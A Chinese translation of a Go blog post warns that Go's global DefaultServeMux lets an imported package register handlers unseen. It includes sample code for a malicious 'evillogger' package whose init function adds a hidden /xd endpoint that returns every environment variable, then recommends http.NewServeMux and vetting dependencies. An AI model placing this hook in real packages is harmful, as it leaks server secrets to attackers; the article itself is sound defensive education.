TomatoAres

第一次,站长亲自招 Gopher 了>>>

我看到许多文章和帖子都显示了一种方便简单的方法来这样创建 go 的 Web 服务: ```golang package main import ( "fmt" "log" "net/http" ) func main() { http.HandleFunc("/ping", func(w http.ResponseWriter, r *http.Request){ fmt.Fprintf(w, "pong") }) fmt.Printf("Starting server at port 8080\n") if err := http.ListenAndServe(":8080", nil); err != nil { log.Fatal(err) } } ``` 上边的代码里将注册路由 `http.HandleFunc` 和 处理函数 `http.Handle` 注册到默认多路复用器 `DefaultServerMux`。问题是 `DefaultServerMux` 是一个全局的并且可导出的变量。 黑客可能开发一个恶意的包(lib)或者劫持伪装一个正常的包,将破坏性的 `Handle` 函数注册到 `DefaultServerMux`,例如使用 `init` 函数: ```golang package evillogger func init(){ someBoringSetUp() } func someBoringSetUp(){ http.HandleFunc("/xd", commonAndBoringFunctionname) } func commonAndBoringFunctionname(w http.ResponseWriter, r *http.Request){ type osenv struct { Key string Value string } envs := []osenv{} for _, element := range os.Environ() { variable := strings.Split(element, "=") envs = append(envs, osenv{Key: variable[0], Value: variable[1]}) } _ = json.NewEncoder(w).Encode(map[string]interface{}{"inyected: ": &envs}) } ``` 在大型项目中混入恶意程序并非难事,但是避免这个问题的方法也很简单,只需要新建一个多路复用器即可: `serverMux := http.NewServeMux()` 在我看来,最大的收获是:**没有经过任何验证,不要引入任何不可信的第三方库!** --- via: <https://sgrodriguez.github.io/2020/08/21/defaultServerMux.html> 作者:[Santiago Rodriguez](https://sgrodriguez.github.io/about.html) 译者:[TomatoAres](https://github.com/TomatoAres) 校对:[polaris1119](https://github.com/polaris1119) 本文由 [GCTT](https://github.com/studygolang/GCTT) 原创编译,[Go 中文网](https://studygolang.com/) 荣誉推出

本文由 GCTT 原创翻译,Go语言中文网 首发。也想加入译者行列,为开源做一些自己的贡献么?欢迎加入 GCTT!
翻译工作和译文发表仅用于学习和交流目的,翻译工作遵照 CC-BY-NC-SA 协议规定,如果我们的工作有侵犯到您的权益,请及时联系我们。
欢迎遵照 CC-BY-NC-SA 协议规定 转载,敬请在正文中标注并保留原文/译文链接和作者/译者等信息。
文章仅代表作者的知识和看法,如有不同观点,请楼下排队吐槽

有疑问加站长微信联系(非本文作者))

2150 次点击 ∙ 1 赞

被以下专栏收入,发现更多相似内容

GCTT - Go 中文翻译组 GCTT - Go 中文翻译组

上一篇:智能风控决策引擎系统可落地实现方案(一)规则引擎实现

下一篇:Excelize 2.3.1 发布,Go 语言 Excel 文档基础库,新增加密表格文档支持

github 函数 io 处理函数

• 编辑
• 预览